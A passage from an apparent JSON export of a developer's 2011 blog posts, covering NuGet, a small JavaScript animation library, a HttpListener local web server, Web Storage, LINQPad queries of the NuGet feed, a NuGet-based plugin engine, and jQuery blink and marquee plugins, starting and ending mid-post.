folder nesting is allowed) There’s also a Package Explorer tool available if you want to dig around the internals of existing packages.\nShould you care? I think that NuGet is something that is very vital to the .NET ecosystem. The lack of a unified package management system has been the bane of .NET development for a long time. Yes NuGet wasn’t the first, but does that really matter. I don’t care for the arguments that were waged when NuGet first came out. Accept that it’s here to stay and move on.\nAnd with that said I’m of the opinion that if it’s not on NuGet then it doesn’t exist. Harsh as this may seem but I’ve got better things to do than:\nFind the latest stable build Monitor a project for new versions Update my version when new releases are out Ask any Rubiest if they’d use something that wasn’t a gem and you’ll pretty much always receive a no.\nIs NuGet just for Open Source? This was a question asked at a developer event recently, and although it seems that most of the projects which are on NuGet are OSS I don’t see why NuGet would be confined to OSS.\nI don’t think that you could really do anything truly commercial from the official NuGet feed, but I can’t see why you couldn’t have a trial version of a library on there and as part of the install process’ T&C’s state that it’s got restrictions.\nNuGet and Mono Something that was a topic of discussion last night with Demis was “Does NuGet work on Mono?” and from the quick searching I did it would seem that there isn’t a Mono version of the “Add Library Reference” dialog that the Visual Studio tools provide. From what I read there is some limitations to running NuGet on Mono (and I’m referring to the Mono CLR) due to some CLR 4 features that NuGet uses which aren’t available on Mono yet.\nDemis argued that if Microsoft was really serious about NuGet being a way to deliver open source projects to developers then they should be ensuring that it has Mono tooling.\nI beg to differ on this point. Microsoft have done (mostly) the right things so far, the source is available, there are contribution guidelines if you want to fix issues and there is documentation on the package format. This is about as open source as you’re going to find from Microsoft these days and it’s a heck of a lot better than the Microsoft of old, but as for actually building the tools for MonoDevelop, I think that’s something they should stay away from.\nIf Microsoft was to add the support to MonoDevelop then it could be seen very much as an overbearing effort to push the platform (not that it’s not being pushed hard already :P).\nWant to know more? If you’re wanting to know more about NuGet I suggest that you keep an eye on David Ebbo and David Fowler.\n", "id": "2011-03-28-an-uninformed-overview" }, { "title": "Animating with JavaScript", "url": "https://www.aaron-powell.com/posts/2011-03-13-javascript-animation/", "date": "Sun, 13 Mar 2011 00:00:00 +0000", "tags": [ "javascript", "web" ], "description": "A look at how to make a simple JavaScript animation library", "content": "I’ve always considered the animation aspect of jQuery to be a bit of black magic (and well I still do :P) but at the same time I want to know how it works.\nRecent a client had a need for some really basic animation (changing some elements dimentions) and they aren’t using jQuery (and aren’t in a position to add it as a dependency) so I needed to work out another solution. This gave me the opportunity I’d wanted, a chance to delve into what it would take to make animation work.\nWell turns out it’s not really that complex, in fact it can be done in about 60 lines of code. Rather building suspense here is the code that I’ll be going over.\nNow that you’ve seen the full code let’s see about breaking it down.\nCreating a starting pointI’m going to use a self executing function to setup what we need, let’s create a skeleton like so:\nvar animator = (function() { return function(el, opts) { //do stuff }; })(); There’s two input arguments, an element to target and a set of options which will be the CSS properties we want to manipulate.\nWe’ll do some basic validation, ensuring there was either an element or an ID selector (no I’m not building a selector engine too :P) and ensuring that we did receive some CSS rules. Then a type check is done against el to see if it was a DOM element or a selector (and yeah it’s pretty basic) but the ulimate goal is to get a single DOM element which we can work against.\nNext let’s setup some variables we’ll need:\nvar start = +new Date, duration = opts.duration || 600, end = start + duration, calc = el.currentStyle || getComputedStyle(el, null), style = buildStyles(opts.css), data = {}; Here’s a trick, you can do +new Date to grab the ticks right now ;).\nWe’re grabing a few values such as the start and end time periods, the duration for an animation (or a default of 600 miliseconds), the styles of the element (using currentStyle or getComputedStyle depending on whether you’re in a current generation browser or not). The current styles are going to be important when we get to the actual animation stage. The property (or method) returns an array which contains all the CSS rules applied to the element. Why do we need this? Well when we’re doing the animation we need to know how far we have to ’travel’. If say you’re going from padding-top:10px to padding-top:30px we don’t want to cover 30px in total, just 20px, and if we know the starting point then we wont break the existing UI.\nNext we’re going to build up the styles. For this we’re going to jump out to a method to handle that.\nBuilding the style rulesFirst we need a list of CSS properties which we’ll support:\nvar supported = ('padding-top,padding-bottom,padding-left,padding-right,font-size,line-height,margin-top,margin-bottom,' + 'margin-left,margin-right,border-top,border-bottom,border-left,border-right,width,height').split(','); This I’m doing as a comma-separated string which is then split (I just find it more readable) and as you can see it just supports dimention-based manipulation.\nWe’ll next build up a string which represents the full style rule set that we’re wanting to create:\nvar buildStyles = function (style) { var s = ''; for (var x in style) { s += ' ' + x + ':' + (typeof style[x] == 'function' ? style[x]() : style[x]) + ';'; } As you can see here we’re also supporting functions for the style rules, it allows you to create funky rules based on calculations too :D. Basically it will take this:\n{ css: { 'font-size': '30px', 'padding-top': '10px' } } And produce this:\nfont-size:30px; padding-top:10px; Next we need to get tricky and filter out the rules which are not supported by out little library:\nvar el = document.createElement('div'); el.innerHTML = '<div style="' + s + '"></div>'; var res = {}; for (var i = 0, l = supported.length; i < l; i++) { if ((x = el.firstChild.style[supported[i]])) { res[supported[i]] = parse(x); } } return res; Here we’re producing a DOM element, then adding a child with the full rule set that was request. We’ll then go through all the supported rules, see if it was specified and then build up an object to return which has the rule set we desire. We’ve also got a little parse method here which uses float parsing and regex to return 30px into 30 which we can calculate against.\nThat completes our building of the styles and now we can go back to the core method.\nHandling the stylesNow that we’ve got the styles that we need to animate we have to make a clone of the style rules but set the values to that of the DOM element we’re naimating:\nfor (var p in style) { data[p] = parse(calc[p]); } This is going back to the currentStyles (or getComputedStyles) object we found earlier.\nMaking it animateSo this sees all the boilerplate code out of the way we’ve:\nGot our start, end and duration Know what styles we originally had Know what styles we need to get to Well let’s actually make it work!\nFor this I’m going to use a recursive setTimeout pattern (which I covered in more details here).\nThis is the code that we’re going to need:\nsetTimeout(function go() { var now = +new Date, pos = now > end ? 1 : (now - start) / duration; if (now >= end) { return; } for (var p in style) { el.style[p] = (data[p] + (style[p] - data[p]) * ((-Math.cos(pos * Math.PI) / 2) + 0.5)) + 'px'; } setTimeout(go, 10); }, 10); Now let’s break it down. We’re grabbing the current ticks and working out just how much more ground there is to cover.\nBut first off we need to check if we’ve hit the time period to do the animation in, and if so, just exit out of the timeout.\nIf we are to keep going though we’ll get a bit crazy. So we’ll itterate through all the properties in the style settings we have been told to animate. But this is the crazy part:\n(data[p] + (style[p] - data[p]) * ((-Math.cos(pos * Math.PI) / 2) + 0.5)) I don’t recall where I got this code from but I believe it was from within the jQuery source somewhere. Basically it’s some funky maths to determine a stable incrementation value based on the time remaining for the animation. And this is the most important part, you want to be able to animate at a consistent rate across the duration of the animation. By using the pos (which is defined earlier in the method) we can accurately assume the distance each animation step has to cover.\nOnce all style properties have been processed a timeout of 10 miliseconds is placed to re-execute the animation loop.\nConclusionTo wrap we’ve looked at a way to make a really small and simple animation library. This is not a replacement for jQuery (or any other animation library) but just a good chance to shed some light on how something a little bit black magic works.\nThere’s plenty of things missing from this implementation, such as:\nusing CSS3 animations supporting animation chaining (eg: animate('h1', { css: {'padding-top':'30px'} }); animate('h1', { css: {'padding-top': '10px'} });) notification of animiation completing (aka $.Deferred) But hopefully it does give you some interesting things to think about and if you want to have a play I’ve put a jsfiddle up for it.\n", "id": "2011-03-13-javascript-animation" }, { "title": "ServerHere - When you just need a webserver", "url": "https://www.aaron-powell.com/posts/2011-03-08-serverhere/", "date": "Tue, 08 Mar 2011 00:00:00 +0000", "tags": [ "web" ], "description": "A tool for when you just want to server some files.", "content": "I’ve been doing a lot of JavaScript development recently and as cool as jsfiddle there’s a few things that really irk me about it (which is a topic for another day) and sometimes you just want to run the file locally to see how it goes.\nSo you go and create a HTML and JavaScript file on your file system and you open it in your browser and you have that crazy file system path in your address bar. Most browsers this is fine for, but IE likes to try and be a bit more secure so I’ll often see this:\nSure you can change IE’s security settings to be a little less aggressive and not give you that warning but I quite like that my browser is trying to be a bit secure, I don’t see why that’s such a bad thing.\nBut it can be a pain, if you don’t accept the security warning your JavaScript doesn’t work.\nThere’s several ways I could go about solving this problem, I could use Visual Studio and IIS Express (or Cassini if you’re old-school :P), I could map my local IIS install to that folder or I could write my own web server.\nGuess what I did!\nServerHereIf you guessed that I wrote my own web server then you guessed right. I’ve created a little project called ServerHere which does exactly what the name implies, creates a web server from the current folder.\nIt’s a commandline tool and you use it just like this:\nPS> cd c:\\SomeFolderToServe PS> c:\\Path\\To\\ServerHere.exe And there you go now you’ll have a server running at http://+:8080 (meaning localhost and machine name will work).\nIf you want to change the port it runs on you’ll need to run it as an administrator and then run it like this:\nPS> c:\\Path\\To\\ServerHere.exe /p:1234 Now it’ll run on port 1234 rather than 8080 (or 6590 which is the default administrator port, just to avoid potential conflicts).\nHow do it workThere’s a nifty little class in the .NET framework called HttpListener and this is the core of building your own web server. Basically it’s a little class for handling the HTTP protocol.\nTo use it you need to create a new instance of the class and then specify some prefixes:\nvar listener = new HttpListener(); listener.Prefixes.Add("http://localhost:8080/"); listener.Start(); Now you have a server running and listening on port 8080, via localhost. You can specify what ever hostname you want, or port number (but keep in mind that if you want to run a non-standard port you need to run as an administrator).\nTo actually handle the requests you can do it synchronously or asynchronously, obviously depending what’s best for your scenario. ServerHere listens asynchronously so I’ll cover that off (if you’re interested in synchronous usages check the MSDN docs).\nFirst off we’ll create our web server class:\npublic class HttpServer { private readonly HttpListener _listener; public HttpServer() { _listener = new HttpListener(); _listener.Prefixes.Add("http://localhost:8080/"); _listener.Start(); _listener.BeginGetContext(HandleResponse, null); } public void HandlerResponse(IAsyncResult result) { ... } } What we’re using here is the BeginGetContext method, this will then deal with an async request. When the Context (which is a HttpContext basically) is ready (ie - someone has requested a URL) you can handle it, write to it, etc:\nprivate void HandleResponse(IAsyncResult result) { HttpListenerContext context; try { context = _listener.EndGetContext(result); _listener.BeginGetContext(HandleResponse, null); } catch (HttpListenerException) { return; } using (var response = context.Response) { response.StatusCode = 200; response.ContentType = "text/plain"; using (var writer = new StreamWriter(response.OutputStream)) { writer.Write("Hello World!"); writer.Flush(); } response.Close(); } } This method will do the following:\nGrab the context from the listener (you want to catch the HttpListenerException which will be thrown if the server is shutting down) Keep the server alive by re-issuing a BeginGetContext Get the response from the context Set a status code Set a content type Write something to the response I’ll leave it as an exercise to the reader to work out how to react to different URLs, return more useful responses, etc.\nConclusionTo wrap up we’ve seen a handy little tool for a scenario that you’ll probably never come across.\nWe then looked at the basics for creating your own web server.\nNow go, grab the source and create web servers to your hearts content!\n", "id": "2011-03-08-serverhere" }, { "title": "Making the Internet Explorer JavaScript tools better", "url": "https://www.aaron-powell.com/posts/2011-03-02-ie9-console-thoughts/", "date": "Wed, 02 Mar 2011 00:00:00 +0000", "tags": [ "ie9", "javascript", "web", "web-dev" ], "description": "Some thoughts on how to improve the IE9 JavaScript developer tools", "content": "Previously I’ve blogged about a limitation of console.assert from the IE9 developer tools. Also recently Tatham Oddie blogged some overall thoughts on improving IE9 for developers and I decided to elaborate some thoughts I’ve got around the JavaScript developer tools.\nJavaScript developer tools are a very important part of my toolbox, I really am quite a JavaScript fan (as you may know if you read my blog), so when I find something that irks me it really irks me.\nObject inspection\nWhen you want to inspect an object in dev tools my first thought is to dump it into the console. While the object will dump out it’s not great, if you have nested objects they’ll produce the nice [object Object], also you can’t expand/ collapse the object like with other browsers. If you want to do that you need to put it into the Watch window. This multi-step process is a bit tedious, particularly if you’re prototyping something like jQuery selectors or defining objects on the fly.\nCode completion\nThis is something that I’ve noticed in recent versions of Firebug and the Chrome developer tools and it’s really handy, being able to use intellisence on a JavaScript object.\nConsole clearing\nThere doesn’t seem to be a way to clear the console other than calling console.clear().\nLocals & Call Stack outside of debugging\nI’m not quite sure when you’d use those tabs on the Script window when you’re not in a debugging session.\nNo cross-tab interaction\nWith Chrome and Firebug when you drop a DOM object in the console and you hover over it the element reacts on the browser. This is really useful, especially when working with something like jQuery.\njQuery inspection\nA jQuery selector will return an array, but it’s also an object literal, meaning it’s been augmented with a number of non-array properties. That stuff isn’t what you’re interested in, you just want the selector results. I’d much prefer that it is treated as just an array and the extended properties are ignored.\nWrapping upMostly what I’ve outlined here is nit-picking on the developer tools, they are better than the previous versions and here’s hoping they take some inspiration from the other browsers.\n", "id": "2011-03-02-ie9-console-thoughts" }, { "title": "How to install a package into all projects of a solution", "url": "https://www.aaron-powell.com/posts/2011-02-26-global-install-package/", "date": "Sat, 26 Feb 2011 00:00:00 +0000", "tags": [ "nuget" ], "description": "", "content": "This is a script that I’ve been keeping in my toolbox since NuGet was first released.\nEver now and then I need to do an install of a package across all projects in a solution. log4net is an example of the kind of thing you’d want to globally install, so is Autofac.\nWell here’s a script to run from the Package Management Console:\nGet-Project -All | Install-Package packageName This is also available as a gist.\nNote: replace packageName with what you want to install ;).\nChallenge to the reader\n*Update: With a tip-off from David Fowler you can compress the script even more. If you want to see the original just check out the gist history.\nInstalling into a project subsetSince this is just a powershell script you can also apply filters, so if you have say multiple test projects you do run this:\nGet-Project -All | where { $_.Name.EndsWith(".Test") } | Install-Package NSubstitute Woot!\n", "id": "2011-02-26-global-install-package" }, { "title": "A look at browser storage options", "url": "https://www.aaron-powell.com/posts/2011-02-25-in-browser-storage/", "date": "Fri, 25 Feb 2011 00:00:00 +0000", "tags": [ "javascript", "ie9", "html5", "web", "web-dev" ], "description": "Looking at localStorage, sessionStorage and the like", "content": "Recently I created a little website, Doin’ Nothin’ which has a mostly JavaScript application. This is all well and good, means you don’t have any worries about submitting server data (unless you are registered and you want to save sessions). But it has a problem, because it’s all JavaScript I kept having a problem, I’d forget to log in before starting my session, meaning that I couldn’t save it as navigating to the login page would mean that my session was lost, since it only lived in the memory of the page. Another feature that I was wanting to have was support for leaving the site and coming back to resume a session.\nBut how do we deal with this, currently it’s just a JavaScript API, there’s no server logic for dealing with sessions, tracking time blocks, etc. I could add that in, but then I need to track anonymous users coming and going and they may not like that. Alternatively I could look into browser storage.\nIntroducing browser storageSomething that’s part of the HTML5 specification (seriously, what isn’t part of HTML5 these days :P) is Web Storage (Note: this is different to the Indexed Database) and Web Storage is like cookies, but on steroids.\nThere’s two types of Web Storage, localStorage and sessionStorage and these two ways which you can do browser-level storage.\nBoth types of storage inherit from the same storage sub type, meaning that their API is just the same and they also store data in the same manner. The way data is stored is as a basic key/ value storage, with the value really just being a string. The Web Storage options don’t support storing complex objects as objects so keep that in mind ;).\nlocalStorage The idea of localStorage is that of persistent data across browser sessions. By this I mean that if you close your browser window and then come back data you persisted into localStorage will still be there.\nAnything which is pushed into localStorage will reside in localStorage until it is removed explicitly, so keep that in mind if/ when you are pushing into localStorage\nsessionStorage The idea of sessionStorage is that of persistent data during the browser session, and what I mean is that while you’re navigating your site data in there will stay but once your browser session ends the data will be cleared out.\nWorking with StorageNow that we have a basic overview of the different storage types how do we go about using them?\nWell they are quite easy, both localStorage and sessionStorage reside off the window object, so they are globally accessible. Each type of Storage has three main methods you need to know, setItem, getItem and removeItem. These are the CRUD operations which are exposed from the Storage object.\nNote: there are a few other methods and properties I haven’t covered, such as clear if you want to remove everything.\nHere’s a basic example of how to use localStorage:\nlocalStorage.setItem('foo', 'bar'); console.log(localStorage.getItem('foo')); //bar localStorage.removeItem('foo'); console.log(localStorage.getItem('foo')); //undefined What we’re doing in this demo is adding an item to localStorage, reading it out and then removing it.\nThe exact same operations can be done with sessionStorage.\nWorking with complex objects As I mentioned earlier in the article only strings are handled by the Web Storage API, so how do you deal with a complex object? What would this do:\nlocalStorage.setItem('foo', { foo: 'bar' }); Well you’ll end up with [object Object] stored (well, maybe a bit different depending on browsers, but that’s what you get in IE9), and that’s not very useful. But the lovely thing about JavaScript is JSON, meaning you can convert an object to a string. This means that you can convert {foo: 'bar'} to "{"foo":"bar"}", and then we can push that into our Web Storage of choice.\nThe easiest way to do this is using the JSON object which current generation browsers have in them (if you’re using an older browser you can use this Douglas Crockford library, but chances are Web Storage isn’t available anyway :P).\nNow we can do this:\nlocalStorage.setItem('foo', JSON.stringify({ foo: 'bar' })); console.log(JSON.parse(localStorage.getItem('foo'))); //{ foo: 'bar' } For this we’ve used the JSON.stringify method, this will take a JavaScript object and produces a string. This isn’t limited to just objects, but can also take an Array and make a JSON string from it (but yes, I know arrays are really just objects anyway, but that’s semantics! :P).\nWe can then use the JSON.parse to convert the JSON string back to a JavaScript object, when we’re reading it back out of our Storage.\nBrowser SupportNow that you know all this cool stuff you hit an obvious question, what browsers can I use this with? and it’s a very good question. Here’s a list of what browsers I know it works with:\nIE8 & IE9 FireFox 3.5+ Chrome Safari Opera 10+ Basically any browser from the last few years support Web Storage, so keep that in mind.\nConclusionTo wrap up in this article we’ve looked at the idea of Web Storage and that there is two different types, localStorage if you want to persist across multiple browser sessions or sessionStorage if you want to persist for just the current browser session.\nWe’ve also looked at how to perform CRUD operations against it, using getItem to read, setItem to add and removeItem to delete and the fact that they allow strings only.\nWe finished up by looking at how to store complex objects into the Web Storage locations, using the JSON API.\n", "id": "2011-02-25-in-browser-storage" }, { "title": "Querying NuGet via LINQPad", "url": "https://www.aaron-powell.com/posts/2011-02-24-linqpad/", "date": "Thu, 24 Feb 2011 00:00:00 +0000", "tags": [ "nuget" ], "description": "How to dig into the NuGet feed easily", "content": "I was reading a blog post by Phil Haack today on How to find out which NuGet packages depend on yours and I decided I wanted to do a bit more digging into what I can find out about a package using NuGet’s OData feed.\nA cool feature of LINQPad is that it supports OData feeds, so you can add any OData feed and query against it.\nWell, NuGet is providing all its data via OData, so can we query it?\nSure!\nLet’s revisit the idea that Phil was talking about, finding out what packages depend on another one. Well since it’s just LINQ it’s really easy:\nThat’s all very cool but I decided to dig a bit deeper, I decided to do a simple bit of reporting, basically I’m interested to know this: What packages depend on package X and what version?.\nI decided to use Autofac as a baseline since I know it’s got a number of versions released on NuGet.\nWell it’s easy:\nstring packageName = "Autofac"; var dependencies = Packages .Where(x => x.Dependencies.Contains(packageName)) .ToList() .Select(x => new { Package = x, Dependencies = x.Dependencies.Split('|').Select(y => new { Name = y.Split(':')[0], Version = y.Split(':')[1] }) }) .GroupBy(x => x.Dependencies.Where(y => y.Name == packageName).Select(y => y.Version).First()) .OrderBy(x => x.Key.ToString()); dependencies.Dump(); Note: This is an OData feed so you’re limited to what queries are able to be done on the server. I’m not an OData expert (or really an OData user) so I’m doing most of it in memory once it’s returned.\nThis will then generate you a report which you can browse to find out what packages depend on what version.\nIf you’re interested, at time of writing here is the stats:\nLooks like there’s quite a spread of what packages are depending on the Autofac versions ;).\n", "id": "2011-02-24-linqpad" }, { "title": "Creating a NuGet-based plugin engine", "url": "https://www.aaron-powell.com/posts/2011-02-20-creating-a-nuget-plugin-engine/", "date": "Sun, 20 Feb 2011 00:00:00 +0000", "tags": [ "nuget", "umbraco", "funnelweb" ], "description": "How to create a plugin engine using NuGet as the distribution format", "content": "Two of the main Open Source projects I work on have extensibility aspects to them, Umbraco and FunnelWeb.\nWe’re a bit early in the development cycle for Umbraco 5 to be diving into the packaging, but FunnelWeb is more at a point where we can dive into this. So it got me thinking about how we’d go about creating a simple way that developers can share plugins or themes they’ve created?\nUmbraco 4.x runs a decent package engine, but it’s custom developed, running a custom server, and a bunch of other stuff. For a smallish Open Source project like FunnelWeb this is a large investment which we’re rather avoid. Also with Umbraco 5 we’re looking at whether the custom developed way is the best was to go or not, as again there is time and money that needs to be invested for it too.\nMy next thought was NuGet, it’s all the rage at the moment (rightly so), so I was wondering if we can’t just used it as our source?\nUnsurprisingly I’m not the first person to look at this, it’s powering Orchard’s gallery, but I couldn’t find any decent documentation on how to use it. So after cracking open the Orchard source, doing some investigation it seems to be working. In the rest of this article I’ll cover a very basic way to do it.\nWhat you’ll needThere’s two things you need:\nA server A consumer There’s a server available as part of the NuGet source code, or alternatively you can install the NuGet package for NuGet.Server ;).\nOnce you’ve installed the NuGet.Server package (I’m going to assume that you’ve done that) drop in your own NuGet packages into the /Packages folder and you’re ready to go. If you want to test this add it to Visual Studio and you can test it via http://<your url>/nuget/Packages. Woot, one part down, now for the tricky part.\nConsuming a NuGet feed yourselfLet’s build a little console app which will view our packages, first off you need to add a reference to NuGet.Core and then we can start coding.\nThe first thing you need is a repository which you’re going to work against:\nvar repo = PackageRepositoryFactory.Default.CreateRepository( new PackageSource("http://nuget.local/nuget/Packages", "Default")); It’s easiest to just use the default repository, unless you’re doing something truely scary, and for the PackageSource we’re providing a source which is the URL of the OData feed which our packages sit behind (you can give a file system path if you’re using that and it still works).\nFrom the repository you can:\nList the packages Add a new package Remove a package (The last two I’m assuming are for the feature that’s being toted for NuGet 1.2 which allows you to push new packages from the NuGet console)\nThere’s a number of Extension Methods that are also available which make it easier find packages, so you can do something like this:\nvar package = repo.FindPackage("My-Awesome-Package"); Next thing we want to do is install a package, and for this you need a PackageManager:\nvar packageManager = new PackageManager( repo, new DefaultPackagePathResolver("http://nuget.local/nuget/Packages"), new PhysicalFileSystem(Environment.CurrentDirectory + @"\\Packages") ); For this we need to provide the following:\nThe repository to install from A package path resolver This takes the same path as the repository A folder to install the packages into This could be your /bin if it’s a web app, or anything else you want The PackageManager is what we use to integrate with our local application, and it’s responsible for the install and uninstall process:\npackageManager.Install(package, false); For this we’re providing:\nThe package to install (you can also provide the ID of the package) Whether or not you want dependencies resolved (false tells it to ignore dependencies) It’s just that simple. And to uninstall it’s equally as simple:\npackageManager.Uninstall(package); Again for this you just need to provide the package instance (or ID) of the package to uninstall.\nConclusionAs you can see from only a few lines of code you can create your own consumer of NuGet feeds:\nclass Program { static void Main(string[] args) { var repo = PackageRepositoryFactory.Default.CreateRepository( new PackageSource("http://nuget.local/nuget/Packages", "Default")); var packageManager = new PackageManager( repo, new DefaultPackagePathResolver("http://nuget.local/nuget/Packages"), new PhysicalFileSystem(Environment.CurrentDirectory + @"\\Packages") ); var package = repo.FindPackage("My-Awesome-Package"); packageManager.InstallPackage(package, false); Console.WriteLine("Installed!"); Console.Read(); packageManager.UninstallPackage(package); Console.WriteLine("Uninstalled!"); Console.Read(); } } So keep an eye on FunnelWeb as we work on using this to produce a theme and plugin engine.\nAnd who knows, this may also be the way we do the packager which will ship in Umbraco 5.\n", "id": "2011-02-20-creating-a-nuget-plugin-engine" }, { "title": "Are you Doin' Nothin'?", "url": "https://www.aaron-powell.com/posts/2011-02-18-doin-nothin/", "date": "Fri, 18 Feb 2011 00:00:00 +0000", "tags": [ "ruby", "web" ], "description": "Interested in tracking what doing nothing really means to you?", "content": "I’ve been interested in what the impact low performing computers have on the overall efficiency of my daily output.\nTo this end I decided to put together a little website which you can monitor this with, and this site is Doin’ Nothin’.\nThis little site basically runs a JavaScript app on the front end which will then track each time you start and stop the timer.\nThere is also a sign-up aspect to the site, if you are like me and want to see the long-term impact then you can register and save your sessions, and later review them. Hopefully in the future I’ll be able to add some features to this such as graphing the data and better session management. These are cool ideas, but I can’t be sure as to if I’ll get them done :P.\nSo go on, check it out, have a play :).\n", "id": "2011-02-18-doin-nothin" }, { "title": "How does Umbraco look in IE9 RC?", "url": "https://www.aaron-powell.com/posts/2011-02-11-umbraco-ie9rc/", "date": "Fri, 11 Feb 2011 00:00:00 +0000", "tags": [ "ie9", "umbraco" ], "description": "How do Umbraco look in IE9 RC?", "content": "Sexy!\nSeriously, the IE9 font rendering is just beautiful, best of the current browser set.\nCompare that to Chrome, notice the lack of antialiasing on the header text.\n", "id": "2011-02-11-umbraco-ie9rc" }, { "title": "Issue with Geolocation in IE9 RC", "url": "https://www.aaron-powell.com/posts/2011-02-11-ie9-rc-geolocation-issue/", "date": "Fri, 11 Feb 2011 00:00:00 +0000", "tags": [ "ie9", "web" ], "description": "A (known) issue with the IE9 RC geolocation API.", "content": "UpdateLooks like the server-side fix has been implemented and it not works just fine. Feel free to read on if you’re interested to know why it didn’t work for a period of time.\nYou’ve probably already heard that IE9 RC is available, and one of the features that has been included is the HTML5 Geolocation API.\nI decided to add that to a fun little website that Tatham Oddie and I built, isitbeerti.me, if you allow your location to be known you’ll be able to bring up a map for the route to where it is midday. Hardly useful but fun none the less.\nBut there’s a problem, although geolocation is detected as being a browser feature it fails for me in the IR9 RC.\nQuick Geolocation API primerAt least years REMIX conference Tatham gave a talk about Geolocation (link) and if you want to get a much more in depth look at this check out his talk. Instead I’ll give a quick look at how to work with it in the browser.\nThe idea behind the new geolocation API to have a JavaScript interface to the browser API which will be able to work out just where you’re browsing from.\nThis is pretty sweet, and very easy to use, with the basic implementation requiring just this:\nnavigator.geolocation.getCurrentPosition(function(position) { console.log(position); }); There’s a few points to note about this:\nI’m only passing in a callback for the success event, I’m not passing in an error callback, nor am I passing in any position options (argument #3) I’m not checking if navigator.geolocation actually exists, so it’ll fail with a JavaScript error in older browsers Calling getCurrentPosition will check if the user has allowed the browser to know where you are for the website, if it’s the first time you’ll receive a prompt which you can choose to block it anyway (resulting in the error callback being invoked) The issue with IE9 RCAs I mentioned there’s an issue with the IE9 RC, if you go to a website that requests location information, such as isitbeerti.me, even if I allow it the error callback is invoked. If I do the same thing in Chrome or the latest Firefox it works as advertised.\nWell as it turns out this is a known issue of the RC, and a little birdy has told me that the cause of this is because the service used by the browser has an issue with DateTime objects which aren’t US formatted. Ironically though it does work just fine in the USA, so it seems like an odd issue to have cropped up, after all geolocation does imply something global ;).\nThe same little birdy has said that a fix is in the works, and luckily this is a service level fix so hopefully they can roll it out without any browser changes.\nFingers crossed and we can make location-based websites for all major browser vendors soon.\n", "id": "2011-02-11-ie9-rc-geolocation-issue" }, { "title": "Blink and marquee!", "url": "https://www.aaron-powell.com/posts/2011-02-09-blinking-marquee/", "date": "Wed, 09 Feb 2011 00:00:00 +0000", "tags": [ "jquery", "doing-it-wrong", "web" ], "description": "Aww yeah, old-skool win", "content": "Recently I’ve blogged about creating the a blink tag with jQuery, I’ve also blogged about making a marquee tag.\nWell can we combine them? Sure we can! But with $.Deferred() there’s some more cool things we can do, like this:\n$.when($('h1').blink({ count: 5 }), $('h1').marquee({ count: 1 })) .done(function() { $('h1').css('color', '#f00'); }); Once both the plugins have completed the text will turn red.\nWithout wanting to get too deep into how Deferred works (read the doco for that) the high-level view is that when all the methods that are passed into $.when raise deferred.resolve (it only works if they use promise and such properly), but yeah, that’s how you can have a function invoked when all the deferred method complete!\nHey, you could even do this:\n$.when($(.get('/foo'), $('h1').blink({ count: 5 })) .done(function() { $('h1').css('color', '#f00'); }); Blink & AJAX, how awesome!\nHere’s a jsfiddle if you want to play too.\n", "id": "2011-02-09-blinking-marquee" }, { "title": "Implementing the marquee tag using jQuery", "url": "https://www.aaron-powell.com/posts/2011-02-09-marquee/", "date": "Wed, 09 Feb 2011 00:00:00 +0000", "tags": [ "jquery", "doing-it-wrong", "web", "javascript" ], "description": "This time we'll implement the marquee tag, just because we can!", "content": "It’s time for another foray into the good old days of HTML, and we’re going to look at how to build the <marquee> tag, which has also gone for quite some time.\nAgain we’re going to use jQuery to help us out, so let’s see what we’re building:\n(function($) { $.fn.textWidth = function(){ var calc = '<span style="display:none">' + $(this).text() + '</span>'; $('body').append(calc); var width = $('body').find('span:last').width(); $('body').find('span:last').remove(); return width; }; $.fn.marquee = function() { var that = $(this), textWidth = that.textWidth(), offset = that.width(), width = offset, css = { 'text-indent' : that.css('text-indent'), 'overflow' : that.css('overflow'), 'white-space' : that.css('white-space') }, marqueeCss = { 'text-indent' : width, 'overflow' : 'hidden', 'white-space' : 'nowrap' }; function go() { if(width == (textWidth*-1)) { width = offset; } that.css('text-indent', width + 'px'); width--; setTimeout(go, 1e1); }; that.css(marqueeCss); width--; go(); }; })(jQuery); We then use it like this:\n$('h1').marquee(); As you can probably see this is a bit more involved than when we implemented the <blink> tag.\nBreaking it downFrom what you can see here we’ve actually got 2 plugins that I’m creating, the first one is going called textWidth, the other being the actual marquee.\nNote: I’ve actually used some code I found on the web for the textWidth plugin, which you can find here.\nText Width The first issue we have to overcome is working out just how wide the piece of text we’re going to be moving is, otherwise we don’t really know what we’re going to be moving.\nThe piece of code we’re using for it is quite simple, all it does is creates a hidden tag that will contain only the text, and then get the size of that element. It’s not 100% fool-proof, I’m not taking into account padding/ margin/ border on the span tag, but it’ll generally do the job.\nImplementing Marquee So now that we’re able to work out the width of the text we can start implementing the full marquee plugin, first thing we need to do is setup a few variables:\nthat will be a jQuery instance of the DOM elements we’ve selected textWidth is well, the text width offset is the full width of the element we want css will contain the original values of the elements we’ve about to change for the marquee to work marqueeCss is a set of CSS values we need to change As you can see we are changing some CSS values, what we are setting is:\ntext-indent, we need to set this to the full width of the element, this means that the text wont start until it’s off the screen overflow, so the text doesn’t show up when we push the indent out we will set the overflow to hidden white-space, this is an interesting one, there’s probably a better way to do this, but what it does is prevents the content from breaking to a new line when the width isn’t enough for the content to reside within. This combined with the overflow will mean that the content stays on the one line and isn’t shown until we want Again we’re going to use the recursive setTimeout pattern, which I talked about here, but before we get started we want to update the CSS for the element and then do our first move, decreasing the width by 1px for when we first call go.\nLet’s have another look at the go method:\nfunction go() { if(width == (textWidth*-1)) { width = offset; } that.css('text-indent', width + 'px'); width--; setTimeout(go, 1e1); }; This is why we need the textWidth, as we move once we’ve moved the text off the screen we need to then move it back to the right hand side and it starts all over again.\nWoo it’s so pretty.\nTime for sex appealWhy don’t we add the ability to set the number of times to scroll, that’s an easy one to add:\n$.fn.marquee = function(args) { var that = $(this), textWidth = that.textWidth(), offset = that.width(), width = offset, css = { 'text-indent' : that.css('text-indent'), 'overflow' : that.css('overflow'), 'white-space' : that.css('white-space') }, marqueeCss = { 'text-indent' : width, 'overflow' : 'hidden', 'white-space' : 'nowrap' }, args = $.extend(true, { count: -1 }, args), i = 0; function go() { if(width == (textWidth*-1)) { i++; if(i == args.count) { that.css(css); return; } width = offset; } that.css('text-indent', width + 'px'); width--; setTimeout(go, 1e1); }; that.css(marqueeCss); width--; go(); }; Really all we’ve done here is allow an argument to be passed in, and each time we hit the left edge we increment the count and check if we’ve done enough passes. When we have we’ll set it back to the original state.\nNow you can run this if you want only two passes:\n$('h1').marquee({ count: 2 }); Next up, we’ll add some speed, and that’s just a matter of adding speed to the arguments, and default it to 1e1 so that we have our standard. I wont bore you with the code (it’ll be visible in the next parts anyway), but with this you can just 